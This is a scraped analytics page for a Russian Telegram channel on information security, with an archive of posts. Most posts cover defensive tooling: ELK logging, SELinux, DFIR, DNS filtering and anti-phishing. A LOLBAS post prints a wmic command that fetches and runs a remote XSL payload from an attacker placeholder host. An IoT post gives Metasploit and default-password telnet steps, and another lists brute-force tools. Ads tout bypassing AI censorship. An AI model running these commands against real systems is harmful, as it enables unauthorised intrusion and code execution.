ch
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

关闭频道

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

显示更多

📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览

频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 089 名订阅者,在 技术与应用 类别中位列第 8 760,并在 俄罗斯 地区排名第 45 869 位。

📊 受众指标与增长动态

自 невідомо 创建以来,项目保持高速增长,吸引了 14 089 名订阅者。

根据 26 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 821,过去 24 小时变化为 0,整体触达仍然可观。

  • 认证状态: 未认证
  • 互动率 (ER): 平均受众互动率为 9.98%。内容发布后 24 小时内通常能获得 5.58% 的反应,占订阅者总量。
  • 帖子覆盖: 每篇帖子平均可获得 1 407 次浏览,首日通常累积 786 次浏览。
  • 互动与反馈: 受众积极参与,单帖平均反应数为 8。
  • 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。

📝 描述与内容策略

作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

凭借高频更新(最新数据采集于 27 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。

14 089
订阅者
无数据24 小时
+2477 天
+82130 天
帖子存档
🪖 Подборка сервисов и фреймворков для anti‑phishing — Фишинг остаётся одним из главных векторов атак, поэтому нужен не один
🪖 Подборка сервисов и фреймворков для anti‑phishing — Фишинг остаётся одним из главных векторов атак, поэтому нужен не один волшебный продукт, а стек из инструментов: проверка ссылок и доменов, фильтрация почты, симуляция атак и т.д.
1. Gophish — популярнейший open source фреймворк для эмуляции рассылок, сбора метрик и обучения 2. PhishTank — бесплатная народная база фишинговых сайтов с API, хороший дополнительный источник IOC для быстрой проверки ссылок и интеграции в собственные скрипты и прокси 3. OpenPhish — коммерческий фид URL/домёнов, замеченных в фишинговых кампаниях. Часто используется как источник данных для SIEM, почтовых шлюзов и NGFW 4. VirusTotal — стандарт проверки подозрительных файлов и ссылок, даёт пересечение по десяткам движков и репутационных движков, удобен для ручного и автоматизированного анализа 5. urlscan.io — глубокий разбор URL: скриншоты, DOM, сетевые запросы, редиректы и маппинг на связанные домены; полезен для разборов сложных фишинговых страниц и brand‑impersonation 6. Google Safe Browsing API — проверка ссылок по базе Google; логично использовать как ещё один слой проверки URL в прокси, боте или веб‑приложении 7. Barracuda Email Protection — комплексная защита почты с сильным уклоном в антифишинг и защиту доменной репутации 8. KnowBe4 — один из самых известных сервисов user awareness: фишинговые симуляции, обучение, метрики кликабельности и снижение риска за счёт практики 9. King Phisher — более продвинутый фреймворк для сложных фишинг‑кампаний c шаблонами, трекингом действий пользователей и гибкой кастомизацией. 10. URLhaus / Spamhaus — фиды вредоносных и фишинговых URL или домёнов, которые удобно использовать как источник IOC для почтовых шлюзов, SIEM и систем хантинга
Дальше можно наращивать глубину: добавлять интеграции с SIEM, SOAR, прокси и писать хантинг‑запросы поверх фидов и логов 🖱 😈 Codeguard | Чат

💀 Настройка и анализ журналов безопасности с помощью Elastic Stack (ELK) — В любой современной системе инфобеза журналы явля
💀 Настройка и анализ журналов безопасности с помощью Elastic Stack (ELK) — В любой современной системе инфобеза журналы являются чуть ли не основными источниками событий. ELK‑стек (Elasticsearch + Logstash + Kibana) позволяет собирать и анализировать огромный поток логов в реальном времени, что критично для обнаружения атак и расследований 🗒 Быстрая стартовая цепочка ELK: 1️⃣ Установка и настройка Filebeat (отправляет журналы с сервера)
sudo apt install filebeat
sudo nano /etc/filebeat/filebeat.yml
filebeat.inputs:
  - type: log
    paths:
      - /var/log/auth.log
      - /var/log/syslog
(Эта настройка берёт базовые Linux‑логи и отправляет их по сети на Logstash для дальнейшего анализа) 2️⃣ Настройка Logstash: фильтруем и парсим события для поиска ключевых деталей
input { beats { port => 5044 } }
filter {
  grok { match => { "message" => "%{SYSLOGTIMESTAMP:timestamp} %{HOSTNAME:host} %{DATA:program} %{GREEDYDATA:msg}" } }
  date { match => [ "timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ] }
}
output { elasticsearch { hosts => ["localhost:9200"] index => "security-logs-%{+YYYY.MM.dd}" } }
(Конфиг Logstash разбирает системные логи: вытаскивает дату, хост, программу, сообщение, чтобы в итоге события лежали в индексах с датой) 3️⃣ В Kibana быстро настраиваем дашборды: — Выбираем нужный индекс “security-logs-*” — Затем задаём фильтры (user, event.type, IP) — Строим графики и ищем всплески активности. Вот и все 👾 👀 Практические лайфхаки: Грок‑фильтры вытаскивают важные поля, визуализации показывают динамику событий, а деление по датам индекс ускоряет расследование и поиск аномалий 📚 Материалы для прокачки: *Официальная документация Filebeat* *Руководство по Grok парсингу* Пишите в чат, на какую тему вы бы хотели получить интересный гайд 👽 😈 CodeGuard | Чат

Айтишник, присаживайся поудобнее: собрали для тебя подборку лучших каналов про ИИ, разработки и языки кода. • Only GPT — твой
Айтишник, присаживайся поудобнее: собрали для тебя подборку лучших каналов про ИИ, разработки и языки кода. • Only GPT — твой гид по нейронкам, секретным функциям GPT 5.1 и способам обхода внутренней цензуры. • Only Hack — канал профессионального хакера про приватность и безопасность. • Only Apple — инсайды о новых девайсах Apple и утечки от разработчиков компании. • Only Python — ТОП-1 бесплатные материалы по питону в Интернете. • Only IT — прорывные стартапы, которые задают тренды в индустрии. • Only GitHub — всякие полезности (и бесполезности) с Гитхаба. • Only Tech — все самые свежие и актуальные технологии. • Ну и мемасики про IT конечно Сохраняй в подписках!

😈 Как в Wireshark расшифровать Wi-Fi трафик Начнём с главного — расшифровка Wi-Fi трафика не так проста, как кажется. Просто иметь пароль точки доступа недостаточно. Чтобы расшифровать трафик, нужны: 🔵 Рукопожатие, то самое четырёхэтапное (4-way handshake) между клиентом и точкой доступа, которое происходит перед передачей интересующих данных 🔵 Пароль от сети (ключ для подключения к точке доступа) Без рукопожатия расшифровать перехваченный трафик нельзя, даже если у вас есть пароль.
В Wireshark нужно: 1) Захватить трафик вместе с рукопожатием (например, через Airodump-ng или сам Wireshark в режиме мониторинга) 2) В настройках Wireshark добавить ключ для расшифровки в формате wpa-pwd парол:SSID 3) Включить поддержку IEEE 802.11 в параметрах протокола
После этого трафик станет доступен для анализа — увидите DNS, HTTP запросы и другие полезные пакеты. 🤒 Подробнее руководство тут 😈 CodeGuard | Чат

✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности «•» При необходимости жёсткой изоляции процессов
✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности
«•» При необходимости жёсткой изоляции процессов на хосте на сцену выходят два главных инструмента Mandatory Access Control: SELinux и AppArmor. Оба: маст‑хэв для серверов, рабочих станций, облака. Но чем же они отличаются и как научится их настраивать без боли?
⚠️ SELinux — внедряет контроль на базе меток и в итоге каждая программа, файл и пользователь получает "security context"
/usr/sbin/setenforce 0 # Включаем в режиме permissive
sestatus # Проверяем статус
sudo setenforce 1 # Изменяем режим на enforcing
sudo nano /etc/selinux/config # Делаем его постоянным 
# Меняем SELINUX=permissive на SELINUX=enforcing
❓ PS: "Permissive" — диагностический режим: фиксирует нарушения, не блокирует. "Enforcing" — реально запрещает всё вне правил 🖥️ AppArmor — действует через профили по путям, проще для понимания и администрирования
sudo aa-status # Проверяем статус AppArmor
sudo ln -s /etc/apparmor.d/usr.sbin.nginx /etc/apparmor.d/enable # Включаем профиль для nginx
sudo systemctl reload apparmor # Вносим изменения в профиль
sudo nano /etc/apparmor.d/usr.sbin.nginx
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx
🤨 Что выбрать? — Выбирайте SELinux, если вам важна высшая гибкость, тонкая настройка политик, хорошая защита от privilege escalation, а также если вы работаете с серверами с жесткими требованиями — Выбирайте AppArmor, если вы новичок, он быстрее оформляется и интегрируется, его легко писать и дебажить профили 🔗Полезные статьи на эту тему: • Core Differences Between SELinux and AppArmor • AppArmor vs SELinux 😈 CodeGuard | Чат

😀 LOLBAS — это каталог легитимных бинарников, скриптов и библиотек Windows, которые могут быть использованы в атаках без отд
😀 LOLBAS — это каталог легитимных бинарников, скриптов и библиотек Windows, которые могут быть использованы в атаках без отдельного вируса — Проект помогает и red team, и blue team: одним - находить реальные векторы, другим - строить детекты и ограничения 👾 Как устроен LOLBAS и что в нём лежит: — В репозитории хранятся YML-описания для каждого бинарника: имя, путь, подозрительные команды, MITRE ATT&CK и т.д. Это удобно парсить и загружать в SIEM/EDR. Упрощённый пример структуры записи:
Name: WMIC
Category: Binaries
FullPath:
  - Path: C:\Windows\System32\wbem\wmic.exe
Commands:
  - Command: wmic.exe process get brief /format:"http://attacker/payload.xsl"
    Description: Execute script from remote XSL
MitreID:
  - T1218.011
⚽️ Один из типичных кейсов — использование wmic.exe для выполнения кода через XSL-шаблон, хостящийся удалённо:
wmic.exe process get brief /format:"http://attacker/payload.xsl"
• wmic.exe — подписанный Microsoft бинарник • через /format подсовывается XSL с внедрённым скриптом • в итоге код выполняется руками доверенного системного инструмента, что сильно осложняет детект 🛡 Зачем опытному спецу смотреть на LOLBAS? — Генерация правил по конкретным бинарникам и аргументам, привязка к ATT&CK — Ограничение ненужных LOLBins через AppLocker/WDAC/EDR, whitelisting/blacklisting. — Приоритизация подозрительных процессов и команд, основанная на живой базе LOtL‑артефактов 📱 Ссылка на проект: [тык] 😈 CodeGuard | Чат

ИБ | Кибербезопасность | Разработка 🔥 Здесь основные IT направления, не упусти 🥶 Hacking - t.me/indigo_hack 👊 Linux & Bash - t.me/linux_bash 👩‍💻 Python - t.me/indigo_python 👩‍💻 Web - t.me/indigo_web
База знаний - Здесь (открыто) 🔥
Искал медь, а нашел золото - вступай ⚡️

🤒 Безопасность IoT-устройств с Kali Linux Metasploit IoT-устройства повсюду — от умных камер и роутеров до «умных» лампочек.
🤒 Безопасность IoT-устройств с Kali Linux Metasploit IoT-устройства повсюду — от умных камер и роутеров до «умных» лампочек. Но часто безопасность там оставляет желать лучшего. Я решил проверить, насколько они уязвимы, используя Kali Linux и Metasploit. 🔍 Сканируем сеть и находим устройства В Kali запускаю сканирование сети:
nmap -sP 192.168.1.0/24
Так я получаю список активных устройств и их IP-адресов. 🤒 Определяем уязвимые сервисы на IoT Для каждого IP проверяю открытые порты и сервисы:
nmap -sV -p 22,80,161,443,5555 <IP_устройства>
Обращаю внимание на telnet, ssh, веб-интерфейсы, SNMP. 🚀 Используем Metasploit для теста уязвимостей
msfconsole
И подгружаю модули для известных уязвимостей IoT, например:
use exploit/linux/http/hikvision_rtsp_auth_bypass
set RHOST <IP_устройства>
run
Или модуль для telnet с дефолтными паролями:
use scanner/telnet/telnet_login
set RHOSTS <IP_устройства>
set USERNAME root
set PASSWORD admin
run
⚠️ Во многих случаях IoT-устройства идут с дефолтными или слабыми паролями — это самая частая «дырка». 😈 CodeGuard | Чат

✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности «•» При необходимости жёсткой изоляции процессов
✨ SELinux и AppArmor: настройка, практические правила и секреты безопасности
«•» При необходимости жёсткой изоляции процессов на хосте на сцену выходят два главных инструмента Mandatory Access Control: SELinux и AppArmor. Оба: маст‑хэв для серверов, рабочих станций, облака. Но чем же они отличаются и как научится их настраивать без боли?
⚠️ SELinux — внедряет контроль на базе меток и в итоге каждая программа, файл и пользователь получает "security context"
/usr/sbin/setenforce 0 # Включаем в режиме permissive
sestatus # Проверяем статус
sudo setenforce 1 # Изменяем режим на enforcing
sudo nano /etc/selinux/config # Делаем его постоянным 
# Меняем SELINUX=permissive на SELINUX=enforcing
❓ PS: "Permissive" — диагностический режим: фиксирует нарушения, не блокирует. "Enforcing" — реально запрещает всё вне правил 🖥️ AppArmor — действует через профили по путям, проще для понимания и администрирования
sudo aa-status # Проверяем статус AppArmor
sudo ln -s /etc/apparmor.d/usr.sbin.nginx /etc/apparmor.d/enable # Включаем профиль для nginx
sudo systemctl reload apparmor # Вносим изменения в профиль
sudo nano /etc/apparmor.d/usr.sbin.nginx
sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx
🤨 Что выбрать? — Выбирайте SELinux, если вам важна высшая гибкость, тонкая настройка политик, хорошая защита от privilege escalation, а также если вы работаете с серверами с жесткими требованиями — Выбирайте AppArmor, если вы новичок, он быстрее оформляется и интегрируется, его легко писать и дебажить профили 🔗Полезные статьи на эту тему: • Core Differences Between SELinux and AppArmor • AppArmor vs SELinux 😈 CodeGuard | Чат

😍 Анализ и фильтрация DNS-трафика для защиты от подмены и MITM-атак — DNS в последнее время стал одним из главных векторов а
😍 Анализ и фильтрация DNS-трафика для защиты от подмены и MITM-атак — DNS в последнее время стал одним из главных векторов атаки: злоумышленники подменяют ответы на запросы, направляют на фишинговые сайты или используют Man-in-the-Middle для перехвата данных Разберем как можно избежать этого: 🔍 Критичные методы анализа
• Логирование и мониторинг DNS-запросов — выявляйте массовые и подозрительные обращения к неизвестным доменам • Внедрение DNSSEC — подписи записей позволяют обнаруживать подделку данных в цепочке разрешения имён • Проверяйте повторяющиеся запросы к IP или доменам, не характерных для типичного юзера
👩‍💻 Фильтрация на практике
• Используйте локальный DNS-фильтр, такие как Pi-hole или AdGuard DNS — они позволяют блокировать вредоносные или нежелательные домены до их разрешения • Глубокий анализ трафика (DPI) на шлюзе — блокируйте подозрительные paкеты и туннели, например, через Suricata • Собирайте списки доверенных DNS-серверов и жёстко ограничивайте доступ к сторонним и публичным серверам
⚠️ Противодействие MITM
• Переходите на DNS-over-HTTPS (DoH) или DNS-over-TLS (DoT) — трафик шифруется, MITM с простым перехватом невозможен • Контролируйте поведение TLS — жёсткая проверка сертификатов и политик безопасности на клиенте. • Используйте инструменты тестирования MITM (например, mitmproxy) — для проверки устойчивости своей инфраструктуры
🗒 Выводы и рекомендации: без автоматического анализа и фильтрации DNS-трафика вы не узнаете о большинстве атак до полного компрометации, также старайтесь чаще внедрять современные методы: DNSSEC, DoH, DPI и локальные фильтры ➡️ Статья для подробного изучения 😈 CodeGuard | Чат

⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для раз
⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для разборов взломов, анализа образов дисков, дампов памяти и артефактов на хостах/SOC‑стороне:
1) Autopsy — GUI‑надстройка над Sleuth Kit для анализа дисков и файловых систем 2) Sleuth Kit — консольный набор утилит для файловой форензики и восстановления артефактов 3) Volatility — классика memory forensics: процессы, модули, сети, хэндлы из дампа ОЗУ 4) Rekall — альтернатива Volatility для анализа памяти, есть собственные драйверы для дампа 5) Redline — форензика памяти и файловой системы Windows от FireEye, удобно для триажа хостов 6) MemProcFS — монтирует дамп памяти как виртуальную FS, чтобы гулять по нему как по диску 7) FTK Imager — создание и просмотр образов дисков, извлечение файлов и артефактов 8) DFIR ORC — сбор артефактов с Windows‑хостов для дальнейшего анализа 9) EZ Tools — мощный набор для анализа логов, артефактов Windows, временных меток 10) Velociraptor — агент‑ориентированный live response и сбор артефактов с множества хостов 11) Cold Disk Quick Response — ускоренный анализ cold‑образов дисков с фокусом на инциденты 12) TheHive — платформа для управления расследованиями и кейсами 13) Cortex — движок для запуска анализов и обогащения артефактов (hash, IP, URL) прямо из TheHive 14) Intezer Analyze — анализ бинарников и процессов по генетике кода, поиск семейств малвари 15) Wireshark — разбор PCAP, восстановление сессий и сетевых артефактов в рамках расследования 16) NetworkMiner — пассивная форензика сети: извлечение файлов, сессий, учёток из PCAP 17) CyberChef — швейцарский нож для декодинга, парсинга, работы со строками, хешами и артефактами 18) KAPE — быстрый сбор форензик‑артефактов с дисков/хостов по заранее заданным таргетам 19) dfir.training — каталог курсов, тулов и практики по DFIR, если нужно копать глубже 20) GRR Rapid Response — фреймворк для удалённого IR и форензики в распределённых инфраструктурах
Делитесь в чате о каких инструментах сделать подробный пост 🎧 😈 CodeGuard | Чат

Удаляйте ChatGPT. Вы не умеете им пользоваться. Большинство пользователей спамит в ИИ всякую чушь — просят рассказать анекдот
Удаляйте ChatGPT. Вы не умеете им пользоваться. Большинство пользователей спамит в ИИ всякую чушь — просят рассказать анекдот, изливают душу и используют как Гугл. Российский тимлид OpenAI Вадим Петрич рассказывает в «Доктор GPT» как извлекать из нейронок максимум пользы. Это очень интересно: • ТОП №1 нейросеть, генерирующая видео без цензуры вообще • Готовые промты на все случаи жизни • Инсайды и разработки от китов индустрии Подпишитесь, с Доктором GPT нейронки станут инструментом роста, а не безделушкой: https://t.me/+wWliPygRN4g0ZTgy

⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для раз
⚠️ Подборка DFIR: инструменты для цифровой форензики и расследования инцидентов — Подборка тулзов, которые пригодятся для разборов взломов, анализа образов дисков, дампов памяти и артефактов на хостах/SOC‑стороне:
1) Autopsy — GUI‑надстройка над Sleuth Kit для анализа дисков и файловых систем 2) Sleuth Kit — консольный набор утилит для файловой форензики и восстановления артефактов 3) Volatility — классика memory forensics: процессы, модули, сети, хэндлы из дампа ОЗУ 4) Rekall — альтернатива Volatility для анализа памяти, есть собственные драйверы для дампа 5) Redline — форензика памяти и файловой системы Windows от FireEye, удобно для триажа хостов 6) MemProcFS — монтирует дамп памяти как виртуальную FS, чтобы гулять по нему как по диску 7) FTK Imager — создание и просмотр образов дисков, извлечение файлов и артефактов 8) DFIR ORC — сбор артефактов с Windows‑хостов для дальнейшего анализа 9) EZ Tools — мощный набор для анализа логов, артефактов Windows, временных меток 10) Velociraptor — агент‑ориентированный live response и сбор артефактов с множества хостов 11) Cold Disk Quick Response — ускоренный анализ cold‑образов дисков с фокусом на инциденты 12) TheHive — платформа для управления расследованиями и кейсами 13) Cortex — движок для запуска анализов и обогащения артефактов (hash, IP, URL) прямо из TheHive 14) Intezer Analyze — анализ бинарников и процессов по генетике кода, поиск семейств малвари 15) Wireshark — разбор PCAP, восстановление сессий и сетевых артефактов в рамках расследования 16) NetworkMiner — пассивная форензика сети: извлечение файлов, сессий, учёток из PCAP 17) CyberChef — швейцарский нож для декодинга, парсинга, работы со строками, хешами и артефактами 18) KAPE — быстрый сбор форензик‑артефактов с дисков/хостов по заранее заданным таргетам 19) dfir.training — каталог курсов, тулов и практики по DFIR, если нужно копать глубже 20) GRR Rapid Response — фреймворк для удалённого IR и форензики в распределённых инфраструктурах
Делитесь в чате о каких инструментах сделать подробный пост 🎧 😈 CodeGuard | Чат

⏱️ Wayback Machine — архив интернета, где ничего не теряется Если сайт удалили, пост пропал или информация изменилась — это е
⏱️ Wayback Machine — архив интернета, где ничего не теряется Если сайт удалили, пост пропал или информация изменилась — это ещё не значит, что она исчезла. Wayback Machine сохраняет копии сайтов и позволяет посмотреть, как они выглядели раньше. 📌Старые версии страниц 📌 Удалённые материалы 📌 Изменения в контенте 📌 Забытые контакты, ссылки, имена
Это отличный инструмент для ИБ-специалистов: 🔍 Восстановление истории сайта и анализ изменений для расследований 🔍 Поиск уязвимостей и страниц, которые были доступны в прошлом 🔍 Восстановление цепочек событий при OSINT-исследованиях 🔍 Сбор URL для брутфорса и фуззинга через архивированные страницы 🔍 Автоматизированный сбор данных с помощью API и парсеров
Просто вставляешь ссылку — и смотришь архивные копии, которые помогут раскрыть важные детали, считается лучшим другом специалистов по безопасности. 🔗 Ссылка: web.archive.org 😈 CodeGuard | Chat

🟡 Настройка радиочастотного мониторинга и предотвращение атак — практическое применение SDR Software Defined Radio (SDR) позволяет гибко сканировать и анализировать радиочастотный спектр, что критично для обнаружения несанкционированных сигналов и предотвращения атак на беспроводные каналы. 🤒 Основные шаги настройки SDR в Linux: 🔹 Установка SDR++ — универсального ПО для SDR
sudo dpkg -i sdrpp_ubuntu_jammy_aarch64.deb
🔹 Запуск программы с выводом помощи:
sdrpp -h
Позволяет ознакомиться с поддерживаемыми опциями и режимами работы. 🔹 Выбор источника сигнала в интерфейсе: обычно — RTL-SDR адаптер. 🔹 Запуск приёмника для мониторинга эфирного спектра. 📊 Сканирование широкого диапазона с помощью утилиты rtl_power:
rtl_power -f 87M:109M:31.25k -s 2.4M -g 20 -w hamming -P -c 0.05 -i 1s -e 3m spectrum/out87-109.csv
Эта команда мониторит FM-диапазон, сохраняя данные для последующего анализа аномалий.
🛡 Практическое применение в предотвращении атак: - Выявление несанкционированных передач, например, попыток заглушения или подмена сигналов - Мониторинг зон для обнаружения скрытых беспроводных устройств - Анализ спектра для планирования защиты и оптимизации радиоканалов
🤒 Подробнее — blog.radiotech.kz Такой подход позволяет эффективно контролировать радиочастотную обстановку, повышая уровень безопасности в беспроводных системах. 😈 CodeGuard | Chat

Очнись, нас готовят к цифровому ГУЛАГу Уже в десятках регионов России отключают мобильный интернет (даже когда нет атак БПЛА), тестируют «белые списки» и замедляют Телегу. 90% людей тупо смотрят на уплывающий корабль свободного Интернета. Люди поумнее готовятся к новой реальности и читают «Пакет Безопасности». Здесь дают самые свежие связки для приватности и обхода блокировок: приложения и утилиты на случай вайтлистов, прокси, браузеры, сервисы — чего тут только нет. Без шуток, сейчас это один из самых полезных каналов в Телеге. Надеемся на лучшее, но к чему нужно готовиться — вы и сами понимаете: @package_security

✏ 90 дней до работы в кибербезе — план на GitHub с 12K звёзд Хочешь стать специалистом по кибербезопасности? Этот 90-дневный
✏ 90 дней до работы в кибербезе — план на GitHub с 12K звёзд Хочешь стать специалистом по кибербезопасности? Этот 90-дневный план — твой пошаговый помощник с ежедневными задачами и практикой. ➡️ Day 1-7: Network+ Concepts ➡️ Day 8-14: Security+ Concepts ➡️ Day 15-28: Linux Tutorials ➡️ Day 29-42: Python ➡️ Day 43-56: Traffic Analysis ➡️ Day 57-63: Git ➡️ Day 64-70: ELK ➡️ Day 71-77: GCP or AWS or Azure ➡️ Day 85-90: Hacking ➡️ Day 91-92: One Page Resume ➡️ Day 93-95: Where and How to Apply Книги без практики — пустая трата времени. Тут каждый день — чёткие задачи, видео, лабораторные и взломы виртуальных машин. Через 3 месяца ты получаешь реальное портфолио и стартовые навыки для джуна в SOC или пентесте. Ставь ❤️ если посты заходят 😈 CodeGuard | Chat

🧐 Что изучить из BGP, VXLAN, K8s, DevSecOps, SOC и SIEM, если вы отвечаете за сети и ИБ В этом дайджесте собрали курсы и отк
🧐 Что изучить из BGP, VXLAN, K8s, DevSecOps, SOC и SIEM, если вы отвечаете за сети и ИБ В этом дайджесте собрали курсы и открытые уроки и статьи по сетям и информационной безопасности — от DevSecOps и защиты Kubernetes до SOC, SIEM, пентеста и дизайна сетей ЦОД. Если вы отвечаете за устойчивость и безопасность инфраструктуры, здесь можно и точечно подтянуть навыки, и выстроить для себя траекторию обучения. 🔴Бесплатные демо-уроки от экспертов курсов 🔴Курсы со стартом в конце ноября 🔴Курсы со стартом в декабре 🔴Мини-курсы для новичков 🔴Лучшие статьи по ИБ и сетям 😈 CodeGuard | Chat

🤡 Инструменты для брутфорса и пентестинга Если твоя задача — тестировать защиту, искать уязвимости и ломать пароли, вот набо
🤡 Инструменты для брутфорса и пентестинга Если твоя задача — тестировать защиту, искать уязвимости и ломать пароли, вот набор актуальных и мощных инструментов для работы с брутфорсом:
1. Hydra — Поддержка множества протоколов, высокая скорость, гибкость 2. Medusa — массовый и параллельный брутфорс с удобным интерфейсом 3. Ncrack — от создателей Nmap, идеально для сетевого брутфорса 4. Patator — универсальный инструмент с поддержкой разнообразных модулей 5. Crowbar (Cracklord) — мощный для брутфорса сервисов SSH, VNC, RDP и др. 6. John the Ripper — сильный хеш-крэкер с большим сообществом 7. Hashcat — современный и быстрый инструмент для восстановления паролей на GPU 8. Aircrack-ng — незаменим для взлома Wi-Fi с WPA/WPA2 9. CeWL — генератор словарей из текста сайта или документации 10. Crunch — создай свой словарь для атаки от простых до сложных шаблонов 11. Facebook Bruteforce Toolkit (FBBrute) — специализированный инструмент для атаки Facebook 12. Patator SSH — модуль для брутфорса SSH с возможностью маски паролей 13. Burp Suite Intruder — мощный инструмент для автоматического перебора данных на веб-сайтах 14. WFuzz — веб-фуззер для поиска скрытых ресурсов и брутфорса форм 15. Nmap NSE Scripts — расширяемый функционал с модулями для брутфорса и сканирования 16. CrowdSec — платформа для сбора и анализа данных атак в реальном времени 17. RHydra — графическая оболочка для Hydra 18. SSHScan — анализатор SSH-серверов с возможностями сканирования уязвимостей 19. OWASP ZAP — всеобъемлющее тестирование безопасности веб-приложений 20. Dirbuster — поиск скрытых директорий и файлов на веб-сервере
Этот арсенал пригодится как новичкам, так и профи для надёжных аудитов и тестов безопасности. 👍 — завезите, чтоб знал что посты заходят 😈 CodeGuard | Chat